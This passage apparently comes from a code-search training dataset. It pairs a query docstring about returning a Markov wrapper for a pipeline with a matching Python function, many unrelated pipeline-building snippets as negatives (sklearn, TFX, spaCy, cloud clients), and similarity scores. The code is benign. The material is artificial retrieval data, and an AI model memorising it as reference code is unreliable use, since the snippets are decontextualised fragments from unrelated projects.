plsH5 or \\\n \"BaseCalls\" not in plsH5[\"/PulseData\"] or \\\n \"ChangeListID\" not in plsH5[\"/PulseData/BaseCalls/\"].attrs:\n raise PBCmpH5MetaDataError, \\\n \"Unable to locate /PulseData/BaseCalls/ChangeListID in pls file (%s).\" % plsPath\n pipeline = plsH5[\"/PulseData/BaseCalls/\"].attrs[\"ChangeListID\"][ 0 ]\n plsH5.close()\n return str(pipeline)", "def pipeline_ml_factory(\n training: Pipeline,\n inference: Pipeline,\n input_name: str = None,\n conda_env: Optional[Union[str, Path, Dict[str, Any]]] = None,\n model_name: Optional[str] = \"model\",\n model_signature: Union[ModelSignature, str, None] = \"auto\",\n **kwargs\n) -> PipelineML:\n\n pipeline = PipelineML(\n nodes=training.nodes,\n inference=inference,\n input_name=input_name,\n conda_env=conda_env,\n model_name=model_name,\n model_signature=model_signature,\n **kwargs\n )\n return pipeline", "def create(self, params):\n return self.make_client_call('create_pipeline', params)", "def trace_pipeline(pipe):\n _patch_multi_exec_execute(pipe)", "def __call__(self, *pipeline_factories, exceptions=None, wait=True):\n return self.run(*pipeline_factories, exceptions=exceptions, wait=wait)", "def crm_pipelines(self):\n from hubspot3.crm_pipelines import PipelinesClient\n\n return PipelinesClient(**self.auth, **self.options)", "def load_pipeline(file_path: str) -> PreprocessingPipeline:\n pipeline = joblib.load(file_path)\n return pipeline", "def get_cb_pipeline(train):\n from src.features import alchemy_feat, counting_feat, nltk_feat\n features = [\n 
('sentiment', alchemy_feat.Sentiment()),\n ('sent_len', counting_feat.SentenceLength()),\n ('tfidf', counting_feat.BagOfTfIDF(train)),\n ('ner', alchemy_feat.NER()),\n ('pos', nltk_feat.POS())\n ]\n return get_pipeline(features)", "def stages(self):\r\n return pipelines.Stages(self)", "def _create_pipeline(self) -> TfmIterator:\n # 1. Initialise TubRecord -> x, y transformations\n def get_x(record: TubRecord) -> Dict[str, Union[float, np.ndarray]]:\n \"\"\" Extracting x from record for training\"\"\"\n out_dict = self.model.x_transform(record, self.image_processor)\n # apply the normalisation here on the fly to go from uint8 -> float\n out_dict['img_in'] = normalize_image(out_dict['img_in'])\n return out_dict\n\n def get_y(record: TubRecord) -> Dict[str, Union[float, np.ndarray]]:\n \"\"\" Extracting y from record for training \"\"\"\n y = self.model.y_transform(record)\n return y\n\n # 2. Build pipeline using the transformations\n pipeline = self.sequence.build_pipeline(x_transform=get_x,\n y_transform=get_y)\n return pipeline", "def get_pipelines() -> Iterable[DataPipeline]:\n for pipeline_name in get_pipeline_names():\n yield DataPipeline.load(pipeline_name)", "def get_event_log(pipeline_context: PipelineContext = None) \\\n -> logging.Logger:\n pipeline_event_log = logging.getLogger(TIMELINE_EVENT_LOGGER_NAME)\n # wrap logger in an adapter that carries pipeline context\n # such as pipeline name and current pipe element.\n pipeline_event_log = logging.LoggerAdapter(\n pipeline_event_log,\n {PIPELINE_CONTEXT_KEY: pipeline_context})\n return pipeline_event_log", "def read(cls):\n return PipelineJavaMLReader(cls, \"com.ibm.analytics.wml.pipeline.spark.MLPipeline\")", "def make_pipeline():\r\n\r\n mkt_cap_screen = (morningstar.valuation.market_cap.latest > 1e9)\r\n\r\n return Pipeline(\r\n columns={\r\n 'Free Cash Flow': morningstar.cash_flow_statement.free_cash_flow.latest,\r\n }, screen=mkt_cap_screen)", "def load_pipeline(lang=None, split_affixes=True):\n global _load_pipeline\n if lang is None:\n lang = 'es_core_news_md'\n if lang not in _load_pipeline:\n nlp = spacy.load(lang)\n nlp.remove_pipe(\"ner\") if nlp.has_pipe(\"ner\") else None\n nlp.tokenizer = custom_tokenizer(nlp)\n if split_affixes:\n nlp.remove_pipe(\"affixes\") if nlp.has_pipe(\"affixes\") else None\n suffixes = {k: v for k, v in load_affixes().items() if\n k.startswith(AFFIXES_SUFFIX)}\n affixes_matcher = AffixesMatcher(nlp, split_on=[\"VERB\", \"AUX\"],\n rules=suffixes)\n nlp.add_pipe(affixes_matcher, name=\"affixes\", first=True)\n _load_pipeline[lang] = nlp\n return _load_pipeline[lang]", "def create_delivery_pipeline(\n self,\n ) -> Callable[\n [cloud_deploy.CreateDeliveryPipelineRequest], operations_pb2.Operation\n ]:\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"create_delivery_pipeline\" not in self._stubs:\n self._stubs[\"create_delivery_pipeline\"] = self.grpc_channel.unary_unary(\n \"/google.cloud.deploy.v1.CloudDeploy/CreateDeliveryPipeline\",\n request_serializer=cloud_deploy.CreateDeliveryPipelineRequest.serialize,\n response_deserializer=operations_pb2.Operation.FromString,\n )\n return self._stubs[\"create_delivery_pipeline\"]", "def _instantiate_pipeline(self, pipeline_url, input_file, output_file, params):\n pipeline_resource = self.bqSession.fetchxml(pipeline_url, view='short')\n out_pipeline_file = os.path.join(self.options.stagingPath, 
'pipeline.json')\n out_error_file = os.path.join(self.options.stagingPath, 'dream3d_error.txt')\n pipeline_url = self.bqSession.service_url('blob_service', path=pipeline_resource.get('resource_uniq'))\n self.bqSession.fetchblob(pipeline_url, path=os.path.join(self.options.stagingPath, 'pipeline_uninit.json'))\n pipeline_file = os.path.join(self.options.stagingPath, 'pipeline_uninit.json')\n with open(pipeline_file, 'r') as fi:\n pipeline = json.load(fi)\n # replace all placeholders in pipeline template\n _replace_placeholders(pipeline, input_file, output_file, params)\n # write out pipeline to provided file\n with open(out_pipeline_file, 'w') as fo:\n json.dump(pipeline, fo)\n return out_pipeline_file, out_error_file", "def create_pipeline(pipeline_name: Text, \n pipeline_root: Text, \n dataset_name: Text,\n train_steps: data_types.RuntimeParameter,\n eval_steps: data_types.RuntimeParameter,\n accuracy_threshold: data_types.RuntimeParameter,\n ai_platform_training_args: Dict[Text, Text],\n ai_platform_serving_args: Dict[Text, Text],\n beam_pipeline_args: List[Text],\n model_regisrty_uri: Text,\n enable_cache: Optional[bool] = False) -> pipeline.Pipeline:\n\n # Dataset, table and/or 'where conditions' can be passed as pipeline args.\n query=sql_utils.generate_source_query(dataset_name=dataset_name)\n \n # Brings data into the pipeline from BigQuery.\n example_gen = tfx.components.BigQueryExampleGen(\n query=query\n )\n\n # Computes statistics over data for visualization and example validation.\n statistics_gen = tfx.components.StatisticsGen(\n input_data=example_gen.outputs.examples)\n\n # Import schema from local directory.\n schema_importer = ImporterNode(\n instance_name='RawSchemaImporter',\n source_uri=RAW_SCHEMA_DIR,\n artifact_type=Schema,\n )\n\n # Performs anomaly detection based on statistics and data schema.\n validate_stats = tfx.components.ExampleValidator(\n stats=statistics_gen.outputs.output, \n schema=schema_importer.outputs.result\n )\n\n # Performs transformations and feature engineering in training and serving.\n transform = tfx.components.Transform(\n input_data=example_gen.outputs.examples,\n schema=schema_importer.outputs.result,\n module_file=TRANSFORM_MODULE_FILE\n )\n\n\n # Get the latest blessed model for model validation.\n latest_model_resolver = tfx.components.ResolverNode(\n instance_name='latest_blessed_model_resolver',\n resolver_class=latest_blessed_model_resolver.LatestBlessedModelResolver,\n model=Channel(type=Model),\n model_blessing=Channel(type=ModelBlessing)\n )\n \n # Train and save model for evaluation and serving.\n trainer = tfx.components.Trainer(\n# custom_executor_spec=executor_spec.ExecutorClassSpec(\n# ai_platform_trainer_executor.GenericExecutor),\n custom_executor_spec=executor_spec.ExecutorClassSpec(\n trainer_executor.GenericExecutor),\n module_file=TRAIN_MODULE_FILE,\n transformed_examples=transform.outputs.transformed_examples,\n schema=schema_importer.outputs.result,\n transform_output=transform.outputs.transform_output,\n base_model=latest_model_resolver.outputs.model,\n train_args={'num_steps': train_steps},\n eval_args={'num_steps': eval_steps},\n custom_config={'ai_platform_training_args': ai_platform_training_args}\n )\n\n\n # Uses TFMA to compute a evaluation statistics over features of a model.\n model_evaluator = tfx.components.Evaluator(\n examples=example_gen.outputs.examples,\n model=trainer.outputs.model,\n baseline_model=latest_model_resolver.outputs.model,\n eval_config=helper.get_eval_config()\n )\n \n # Use a custom 
AccuracyModelValidator component to validate the model.\n model_validator = AccuracyModelValidator(\n eval_results=model_evaluator.outputs.output,\n model=trainer.outputs.model,\n accuracy_threshold=accuracy_threshold,\n slice_accuracy_tolerance=0.15,\n )\n\n# # Checks whether the model passed the validation steps and pushes the model\n# # to its destination if check passed.\n# pusher = tfx.components.Pusher(\n# custom_executor_spec=executor_spec.ExecutorClassSpec(\n# ai_platform_pusher_executor.Executor),\n# model_export=trainer.outputs.output,\n# model_blessing=model_evaluator.outputs.blessing,\n# #model_blessing=model_validator.outputs.blessing,\n# custom_config={'ai_platform_serving_args': ai_platform_serving_args}\n# )\n \n register = tfx.components.Pusher(\n model=trainer.outputs.model,\n model_blessing=model_validator.outputs.blessing,\n #model_blessing=model_evaluator.outputs.blessing,\n push_destination=tfx.proto.pusher_pb2.PushDestination(\n filesystem=tfx.proto.pusher_pb2.PushDestination.Filesystem(\n base_directory=os.path.join(model_regisrty_uri, pipeline_name)))\n )\n \n return pipeline.Pipeline(\n pipeline_name=pipeline_name,\n pipeline_root=pipeline_root,\n components=[\n example_gen, \n statistics_gen, \n schema_importer, \n validate_stats,\n latest_model_resolver,\n transform,\n trainer, \n model_evaluator, \n model_validator, \n #pusher\n register\n ],\n enable_cache=enable_cache,\n beam_pipeline_args=beam_pipeline_args)", "def run(self):\n self.pipeline = self.set_pipeline()\n self.pipeline.fit(self.X,self.y)\n return self", "def from_crawler(cls, crawler, *args, **kwargs):\n pipeline = cls()\n crawler.signals.connect(pipeline.handle_list_of_items, signal=signals.spider_idle)\n return pipeline" ]
[ "0.614468", "0.5957362", "0.59200114", "0.58368886", "0.5657546", "0.54006594", "0.53980225", "0.53207415", "0.53056926", "0.53035724", "0.5302075", "0.52976626", "0.5268746", "0.52655923", "0.5263156", "0.52361935", "0.52361935", "0.52285284", "0.52276915", "0.5182775", "0.5180908", "0.51678705", "0.51635337", "0.5153052", "0.51524246", "0.5142166", "0.51246774", "0.51197654", "0.5113149", "0.511194", "0.5104858", "0.51006997", "0.5093101", "0.50922614", "0.50916725", "0.5089654", "0.50634575", "0.50619864", "0.5025697", "0.502348", "0.50215673", "0.49903247", "0.49899748", "0.49853757", "0.4984778", "0.49837482", "0.49501458", "0.49446788", "0.4939628", "0.49262187", "0.49092692", "0.49090916", "0.4905714", "0.48802683", "0.48635176", "0.4863481", "0.4861578", "0.48557597", "0.48514456", "0.48383343", "0.48198706", "0.48115602", "0.4802581", "0.4797253", "0.47926536", "0.47833198", "0.47800627", "0.477266", "0.4752981", "0.4748997", "0.4739656", "0.47387978", "0.47297984", "0.4722632", "0.4721616", "0.47190252", "0.47128612", "0.47086492", "0.47059423", "0.46978447", "0.4690289", "0.46898696", "0.46870583", "0.4683998", "0.46803686", "0.4678477", "0.46721867", "0.46498948", "0.46420473", "0.46386892", "0.46275672", "0.4618949", "0.4604689", "0.4602003", "0.46008688", "0.45889622", "0.45847243", "0.4578368", "0.45737544", "0.45734915" ]
0.8226096
0
Return a Markov wrapper for a pipeline.
def get_markov_wrapper(pipe, kwargs):
    from .transforms import MarkovWrapper
    return MarkovWrapper(pipe, **kwargs)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def build_own_pipeline() -> Pipeline:\n clf = svm.LinearSVC(C=2, loss='hinge')\n vect = TfidfVectorizer(ngram_range=(1, 2))\n\n pipeline = None\n ##### Write code here #######\n pipeline = Pipeline([\n ('vect', vect),\n ('tfidf', TfidfTransformer()),\n ('clf', clf)\n ])\n ##### End of your work ######\n return pipeline", "def build_own_pipeline() -> Pipeline:\n nn_pipeline = None\n\n nn_pipeline = Pipeline([\n ('vect', CountVectorizer()),\n ('tfidf', TfidfTransformer()),\n ('clf', MLPClassifier()) \n ])\n \n return nn_pipeline", "def create_pipelines_lingspam():\n stop = ('stop', StopWordRemovalTransformer())\n lemma = ('lemma', LemmatizeTransformer())\n binz = ('binarizer', CountVectorizer())\n we = ('document embedding', DocEmbeddingVectorizer())\n sel = ('fsel', SelectKBest(score_func=mutual_info_classif, k=100))\n clf = ('cls', BernoulliNB()) # Binary features in the original paper. \n return Pipeline([binz, sel, clf]), \\\n Pipeline([stop, binz, sel, clf]), \\\n Pipeline([lemma, binz, sel, clf]), \\\n Pipeline([stop, lemma, binz, sel, clf]), \\\n Pipeline([stop, lemma, we, sel, clf])", "def pipeline(args) :\n from pipeliner import create_pipeline\n create_pipeline(args)", "def create_pipeline_for_kfold(self, args):\n return ClassificationPipeline(args=args)", "def test_generate_pipeline_code():\n pipeline = ['KNeighborsClassifier',\n ['CombineDFs',\n ['GradientBoostingClassifier',\n 'input_matrix',\n 38.0,\n 0.87],\n ['GaussianNB',\n ['ZeroCount',\n 'input_matrix']]],\n 18,\n 33]\n\n expected_code = \"\"\"make_pipeline(\n make_union(\n make_union(VotingClassifier([('branch',\n GradientBoostingClassifier(learning_rate=1.0, max_features=1.0, n_estimators=500)\n )]), FunctionTransformer(lambda X: X)),\n make_union(VotingClassifier([('branch',\n make_pipeline(\n ZeroCount(),\n GaussianNB()\n )\n )]), FunctionTransformer(lambda X: X))\n ),\n KNeighborsClassifier(n_neighbors=5, weights=\"distance\")\n)\"\"\"\n\n assert expected_code == generate_pipeline_code(pipeline)", "def make_pipeline(model):\n\n steps = [\n (\"imp\", SimpleImputer(strategy=\"most_frequent\")),\n (\"norm\", MinMaxScaler()),\n (\"reg\", model)\n ]\n pipeline = Pipeline(steps=steps)\n\n return pipeline", "def create_fake_pipeline(*_args, **_kwargs):\n return Pipeline(\n [\n node(match.clean_match_data, \"fake_match_data\", \"clean_match_data\"),\n node(\n common.convert_match_rows_to_teammatch_rows,\n \"clean_match_data\",\n \"match_data_b\",\n ),\n node(match.add_out_of_state, \"match_data_b\", \"match_data_c\"),\n node(match.add_travel_distance, \"match_data_c\", \"match_data_d\"),\n node(match.add_result, \"match_data_d\", \"match_data_e\"),\n node(match.add_margin, \"match_data_e\", \"match_data_f\"),\n node(\n match.add_shifted_team_features(\n shift_columns=[\n \"score\",\n \"oppo_score\",\n \"result\",\n \"margin\",\n \"team_goals\",\n \"team_behinds\",\n ]\n ),\n \"match_data_f\",\n \"match_data_g\",\n ),\n node(match.add_cum_win_points, \"match_data_g\", \"match_data_h\"),\n node(match.add_win_streak, \"match_data_h\", \"match_data_i\"),\n ]\n )", "def pipeline(self):\n steps = [('DummyDefense', DummyDefense()),\n ('DummyClassifier', DummyClassifier())]\n return Pipeline(steps)", "def pipe(self, func, *args, **kwargs):\n return func(self, *args, **kwargs)", "def pipeline(self) -> Pipeline:\n if self._to_pipeline is None:\n raise AttributeError(\n \"pipeline not available because `to_pipeline` was not set on __init__.\"\n )\n return self._to_pipeline(self)", "def pipeline(self):\n return 
stanza.Pipeline(dir=TEST_MODELS_DIR, processors=\"tokenize,ner\")", "def make_full_pipeline(\n preprocess_pipe: ColumnTransformer, model: BaseEstimator\n) -> Pipeline:\n full_pipe = sklearn.pipeline.Pipeline(\n [(\"preprocess\", preprocess_pipe), (\"model\", model)]\n )\n return full_pipe", "def pipeline():\n\n test_pipeline = (Pipeline()\n .init_variable('current_loss')\n .init_model('model', C('model_class'),\n 'dynamic', C('model_config'))\n .to_array(dtype='float32')\n .train_model('model',\n inputs=B('images'),\n targets=B('labels'),\n outputs='loss',\n save_to=V('current_loss'))\n )\n return test_pipeline", "def build_svm_pipeline():\n svm_pipeline = None\n\n svm_pipeline = Pipeline([\n ('vect', CountVectorizer()),\n ('clf', SGDClassifier()),\n ])\n\n return svm_pipeline", "def run(self):\n pipeline = set_pipeline()\n pipeline.fit(self.X_train, self.y_train)\n return pipeline", "def create_pipeline(path):\n\n pipeline = import_file(path)\n # Perform Wigner-Seitz analysis:\n ws = WignerSeitzAnalysisModifier(\n output_displaced=False, # Output sites\n per_type_occupancies=True, # Output occupancies per atom type\n affine_mapping=ReferenceConfigurationModifier.AffineMapping.ToReference)\n pipeline.modifiers.append(ws)\n # Calculate total and elementwise occupancies\n pipeline.modifiers.append(total_occupancy_modifier)\n # Select all defect sites\n pipeline.modifiers.append(select_defects_modifier)\n # Delete all non-defect sites\n pipeline.modifiers.append(InvertSelectionModifier())\n pipeline.modifiers.append(DeleteSelectedModifier())\n # Find defect clusters\n pipeline.modifiers.append(ClusterAnalysisModifier(\n cutoff=CLUSTER_CUTOFF,\n sort_by_size=False))\n # Classify defect clusters\n pipeline.modifiers.append(classify_defect_clusters_modifier)\n\n return pipeline", "def _pipeline(self, vectorizer, n_features, ngram_range, C):\n classifier = SVC(kernel=\"linear\", C=C, max_iter=1000000, shrinking=1, tol=0.0001)\n vectorizer.set_params(stop_words=None, max_features=self.max_features, ngram_range=ngram_range)\n \n checker_pipeline = Pipeline([\n ('vectorizer', vectorizer),\n ('reduce_dim', SelectKBest(chi2, k=n_features)),\n ('classify', classifier)])\n\n return checker_pipeline", "def pipeline(self):\n return stanza.Pipeline(dir=TEST_MODELS_DIR, processors=\"tokenize,ner\", package={\"ner\": [\"ncbi_disease\", \"ontonotes\"]})", "def make_pipeline():\n # exchange = Fundamentals.exchange_id.latest\n # nyse_filter = exchange.eq('NYS')\n symbol_filter = StaticSids([TRADING_SID])\n set_benchmark(TRADING_SID) \n # volume_filter = VolumeFilter(\n # inputs=[USEquityPricing.volume],\n # window_length=1,\n # mask=symbol_filter\n # )\n\n # is_setup = volume_filter & alpha_long_weekly & alpha_long_daily\n weekly_high = WeeklyHigh(\n inputs=[USEquityPricing.high],\n mask=symbol_filter\n )\n weekly_low = WeeklyLow(\n inputs=[USEquityPricing.low],\n mask=symbol_filter\n )\n weekly_classifier = WeeklyClassifier(\n inputs=[\n USEquityPricing.open,\n USEquityPricing.high,\n USEquityPricing.low,\n USEquityPricing.close\n ],\n mask=symbol_filter\n )\n daily_classifier = DailyClassifier(\n inputs=[\n USEquityPricing.open,\n USEquityPricing.high,\n USEquityPricing.low,\n USEquityPricing.close\n ],\n mask=symbol_filter\n\n )\n\n pipe = Pipeline(\n screen=symbol_filter, # & (daily_classifier > 0),\n columns={\n 'daily_classifier': daily_classifier,\n 'daily_high': USEquityPricing.high.latest,\n 'daily_low': USEquityPricing.low.latest,\n 'weekly_classifier': weekly_classifier,\n 'weekly_high': 
weekly_high,\n 'weekly_low': weekly_low\n }\n )\n return pipe", "def make_pipeline():\n universe = TradableStocksUS('Real Estate') | TradableStocksUS('Utilities') | \\\n TradableStocksUS('Consumer Staples') | TradableStocksUS('Technology') | \\\n TradableStocksUS('Financials') | TradableStocksUS('Energy') | \\\n TradableStocksUS('Materials') | TradableStocksUS('Health Care') | \\\n TradableStocksUS('Industrials') | TradableStocksUS('Consumer Discretionary') | \\\n TradableStocksUS('Communications')\n\n roic = shfd.slice(dimension='MRT', period_offset=0).ROIC.latest\n ebit = shfd.slice(dimension='MRQ', period_offset=0).EBIT.latest\n ev = shfd.slice(dimension='MRQ', period_offset=0).EV.latest\n volatility = AnnualizedVolatility(window_length=100)\n value = ebit / ev\n\n roic_rank = roic.rank(mask=universe)\n value_rank = value.rank(mask=universe)\n volatility_rank = volatility.rank(mask=universe, ascending=False)\n\n spy_ma100_price = SMA(inputs=[USEquityPricing.close], \n window_length=100)[algo.sid(\"FIBBG000BDTBL9\")]\n spy_price = USEquityPricing.close.latest[algo.sid(\"FIBBG000BDTBL9\")]\n\n momentum_score = MomentumScore()\n\n overall_rank = roic_rank + value_rank + volatility_rank\n\n # seven_month_returns = Returns(window_length=148, mask=universe,)\n # one_month_returns = Returns(window_length=30, mask=universe,)\n\n pipeline = Pipeline(\n columns={\n 'stock' : master.SecuritiesMaster.Symbol.latest,\n 'sid': master.SecuritiesMaster.Sid.latest,\n 'sector' : master.SecuritiesMaster.usstock_Sector.latest,\n 'average_dollar_volume': AverageDollarVolume(window_length=200),\n 'price': EquityPricing.close.latest,\n 'volume': EquityPricing.volume.latest,\n 'roic' : roic,\n 'value' : value,\n 'volatility': volatility,\n 'roic_rank' : roic_rank,\n 'value_rank' : value_rank,\n 'momentum': momentum_score,\n 'momentum_decile': momentum_score.deciles(),\n 'volatility_decile' : volatility.deciles(),\n 'overall_rank' : overall_rank,\n 'overall_rank_decile': overall_rank.deciles(),\n 'trend_filter': spy_price > spy_ma100_price,\n # 'returns' : one_month_returns - seven_month_returns\n }, \n screen = universe\n )\n\n return pipeline", "def build_naive_bayes():\n nb_pipeline = None\n ##### Write code here\n nb_pipeline = Pipeline([\n ('vect', CountVectorizer()),\n ('clf', ComplementNB())\n ])\n\n ##### End of your work ######\n return nb_pipeline", "def _make_pipeline(preprocessors, classifier):\n if isinstance(preprocessors, list):\n # support only preprocessing of lenght 2\n return make_pipeline(preprocessors[0], preprocessors[1], classifier)\n if preprocessors is None:\n return make_pipeline(classifier)\n\n return make_pipeline(preprocessors, classifier)", "def get_pipeline(self):\n if hasattr(self, \"pipeline\"):\n return self.pipeline\n steps = [\n # before preprocessor, comes the feature extractor\n ('extractor', TurkishFeatureExtractor()),\n # first the pre-processor\n (\"preprocessor\", TurkishPreprocessor(self.stemmer_name_to_method[self.stemmer_method])),\n (\"vectorizer\", TurkishVectorizer(self.feature_name_to_class[self.feature])),\n # use pca\n # (\"pca\", TruncatedSVD(n_components=20, n_iter=10)),\n (\"adder\", TurkishFeatureAdder(n_components=20, n_iter=10)),\n (\"model\", self.model_name_to_class[self.model])\n ]\n self.pipeline = Pipeline(steps)\n return self.pipeline", "def create_pipeline(clf):\n return Pipeline([('scaler', MinMaxScaler()), ('clf', clf)])", "def pipeline(self):\n # gotta avoid circular imports by deferring\n from .pipeline import Pipeline\n return 
Pipeline().from_source(self._collection)", "def _create_pipeline(self) -> TfmIterator:\n # 1. Initialise TubRecord -> x, y transformations\n def get_x(record: TubRecord) -> Dict[str, Union[float, np.ndarray]]:\n \"\"\" Extracting x from record for training\"\"\"\n out_dict = self.model.x_transform(record, self.image_processor)\n # apply the normalisation here on the fly to go from uint8 -> float\n out_dict['img_in'] = normalize_image(out_dict['img_in'])\n return out_dict\n\n def get_y(record: TubRecord) -> Dict[str, Union[float, np.ndarray]]:\n \"\"\" Extracting y from record for training \"\"\"\n y = self.model.y_transform(record)\n return y\n\n # 2. Build pipeline using the transformations\n pipeline = self.sequence.build_pipeline(x_transform=get_x,\n y_transform=get_y)\n return pipeline", "def create_pipeline(self, train: LAMLDataset) -> LAMLTransformer:\n raise NotImplementedError", "def get_pipeline(features, to_matrix=True):\n feature_names = []\n for feature in features:\n feature_names += feature[1].FEATS\n if to_matrix:\n return Pipeline(features + [('transform', ToMatrix(features=feature_names)), ('norm', MinMaxScaler())])\n else:\n return Pipeline(features)", "def build_model():\n pipeline = Pipeline([\n ('vectorizer', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n # (), # Feature engineering (word2vec/GloVe)\n (\"clf\", MultiOutputClassifier(RandomForestClassifier(n_estimators=100), n_jobs=-1))\n ])\n\n return pipeline", "def pipeline(self, *funcs) -> \"fn\":\n return self._mod.pipeline(self, *funcs)", "def _create_pipeline(self) -> codepipeline.Pipeline:\n source_output = codepipeline.Artifact()\n build_output = codepipeline.Artifact()\n return codepipeline.Pipeline(\n self,\n 'Pipeline',\n stages=[\n self._create_source_stage('Source', source_output),\n # self._create_image_build_stage(\n # 'Build', source_output, build_output),\n # self._create_deploy_stage('Deploy', build_output)\n ]\n )", "def create(pdef):\n from sklearn.pipeline import Pipeline\n return [Pipeline(p) for p in pdef]", "def _get_pipeline(self, params_dict):\n p = Pipeline(steps=[('normalise', StandardScaler()),\n ('add_noise', NoiseAdder()),\n ('dim_reduce', PCA()),\n ('cluster', KMeans())])\n p.set_params(**params_dict)\n return p", "def _make(dataset, model):\n def wrapper(args):\n return SlimExperiment(dataset, model, args)\n return wrapper", "def prime():\n from transformers import pipeline\n\n primer = pipeline(\"feature-extraction\")\n result = primer([\"hello\"])", "def pipeline(func):\n @wraps(func)\n def process(img_or_iterable, *args, **kwargs):\n if isinstance(img_or_iterable, (SliceableIterable, FramesSequence)):\n _len = len(img_or_iterable)\n s = SliceableIterable(img_or_iterable, range(_len), _len)\n s._proc_func = lambda image: func(image, *args, **kwargs)\n return s\n else:\n # Fall back on normal behavior of func, interpreting input\n # as a single image.\n return func(img_or_iterable)\n\n if process.__doc__ is None:\n process.__doc__ = ''\n process.__doc__ = (\"This function has been made pims-aware. When passed\\n\"\n \"a pims reader or SliceableIterable, it will return a \\n\"\n \"new SliceableIterable of the results. 
When passed \\n\"\n \"other objects, its behavior is \"\n \"unchanged.\\n\\n\") + process.__doc__\n return process", "def pipe(self, func: Callable, *args, **kwargs) -> Any:\n return func(self, *args, **kwargs)", "def make_pipeline(sec_list, context):\n\n # Return Factors\n mask = SecurityInList()\n mask.securities = sec_list\n mask = mask.eq(1)\n yr_returns = Returns(window_length=context.return_period, mask=mask)\n sharpe = SharpeRatio(inputs=[yr_returns], window_length=context.return_period, mask=mask)\n\n pipe = Pipeline(\n screen=mask,\n columns={\n 'yr_returns': yr_returns, 'sharpe': sharpe\n }\n )\n return pipe", "def _create_pipiline(tokenizer, model, device, framework):\n tg_params = dict(\n task=\"text-generation\", tokenizer=tokenizer, model=model,\n framework=\"pt\", device=device,\n )\n text_generation_pipiline = pipeline(**tg_params)\n return text_generation_pipiline", "def construct(args,\n **kwargs):\n kw = parse_args(args)\n kw.update(kwargs)\n return (build_pipeline(**kw),\n kw)", "def pipeline_ml_factory(\n training: Pipeline,\n inference: Pipeline,\n input_name: str = None,\n conda_env: Optional[Union[str, Path, Dict[str, Any]]] = None,\n model_name: Optional[str] = \"model\",\n model_signature: Union[ModelSignature, str, None] = \"auto\",\n **kwargs\n) -> PipelineML:\n\n pipeline = PipelineML(\n nodes=training.nodes,\n inference=inference,\n input_name=input_name,\n conda_env=conda_env,\n model_name=model_name,\n model_signature=model_signature,\n **kwargs\n )\n return pipeline", "def similar_bonds_pipeline():\n pipeline = Pipeline(\n steps=[\n ('scaler', StandardScaler()),\n #('encoder', OneHotEncoder()),\n ('pca', PCA(n_components=3)),\n ('knn', KNN()),\n ]\n )\n return pipeline", "def build_naive_bayes():\n nb_pipeline = None\n \n nb_pipeline = Pipeline([\n ('vect', CountVectorizer()),\n ('clf', ComplementNB()),\n ])\n \n return nb_pipeline", "def process(obj, rv, logfile, verbose):\n _end_branch(obj)\n\n logger.info('creating pipeline...')\n stdin = click.get_text_stream('stdin')\n stdout = click.get_text_stream('stdout')\n\n def write(item):\n stdout.write(str(item))\n stdout.write('\\n')\n\n pl = pipeline.create(obj['pipeline'], output=write)\n\n logger.info('processing...')\n logger.info('----------------------------------------')\n try:\n pl.run(stdin)\n except Exception as e:\n logger.error(f'abort: {type(e).__name__}: {e}')\n raise click.Abort from e\n logger.info('----------------------------------------')\n logger.info('DONE.')", "def pipeline(self, pipeline_id):\r\n return pipelines.Pipeline(self, pipeline_id)", "def pipe(*args, **kwargs):\n return parser(*args, **kwargs)", "def to_sklearn(self):\n import sklearn.pipeline as skp\n\n steps = []\n for step in self.steps:\n steps += [(step[0], step[1].to_sklearn())]\n return skp.Pipeline(steps)", "def make_labels_pipeline(self, dataset, return_epochs=False, return_raws=False):\n if return_epochs:\n labels_pipeline = make_pipeline(\n EpochsToEvents(),\n EventsToLabels(event_id=self.used_events(dataset)),\n )\n elif return_raws:\n labels_pipeline = make_pipeline(\n self._get_events_pipeline(dataset),\n EventsToLabels(event_id=self.used_events(dataset)),\n )\n else: # return array\n labels_pipeline = EventsToLabels(event_id=self.used_events(dataset))\n return labels_pipeline", "def test_pipeline(self):\n loss = NSSALoss\n loss_kwargs = {\"margin\": 1.0, \"adversarial_temperature\": 1.0}\n pipeline_results = pipeline(\n model=\"RotatE\",\n dataset=\"nations\",\n loss=loss,\n loss_kwargs=loss_kwargs,\n 
training_kwargs=dict(use_tqdm=False),\n )\n self.assertIsInstance(pipeline_results, PipelineResult)\n self.assertIsInstance(pipeline_results.model.loss, loss)\n self.assertEqual(pipeline_results.model.loss.margin, 1.0)\n self.assertEqual(pipeline_results.model.loss.inverse_softmax_temperature, 1.0)", "def __build_ml_pipeline(self, clf: MultiOutputClassifier) -> Pipeline:\r\n pipeline = Pipeline([\r\n ('features', FeatureUnion(\r\n [('text', Pipeline(\r\n [('text_field_extractor', \r\n basic_utils.TextFieldExtractor('message')), \r\n #('vect', CountVectorizer(tokenizer=clean_text)),\r\n #('tfidf', TfidfTransformer())\r\n ('tfidf', TfidfVectorizer(tokenizer=basic_utils.tokenize, \r\n min_df=.0025, max_df=0.25, \r\n ngram_range=(1,2)))\r\n ])),\r\n \r\n ('numerics', FeatureUnion(\r\n [('text_len', \r\n Pipeline([('text_len_extractor', \r\n basic_utils.NumericFieldExtractor('text_len')), \r\n ('text_len_scaler', StandardScaler())\r\n ])),\r\n ('punt_perc', \r\n Pipeline([('punt_perc_extractor', \r\n basic_utils.NumericFieldExtractor('punt_perc')), \r\n ('punt_perc_scaler', StandardScaler())\r\n ]))\r\n ])),\r\n ('starting_verb', basic_utils.PosFieldExtractor('starting_verb_flag'))\r\n ])),\r\n \r\n ('clf', clf)\r\n ])\r\n \r\n return pipeline", "def pipeline(self):\n return self._pipeline", "def pipeline(self):\n return self._pipeline", "def make_pipeline(steps):\n def compose2(f, g):\n return lambda x: g(f(x))\n return functools.reduce(compose2, steps)", "def get_pipeline(tag=None):\n\n\n data_science_pipeline = (\n # interdiction_baseline_call_pl()\n # + interdiction_baseline_parse_pl()\n #+ interdiction_community_pl()\n #+ interdiction_community_parse_pl()\n #+ dijkstra_prep_paths_pl()\n #+ dijkstra_parse_paths_pl()\n #+ dijkstra_reachable_pl()\n #+ dijkstra_shortest_paths_pl()\n + dijkstra_pypy_pickle_pl()\n + dijkstra_pypy_paths_pl()\n + dijkstra_make_adj_pl()\n #+ 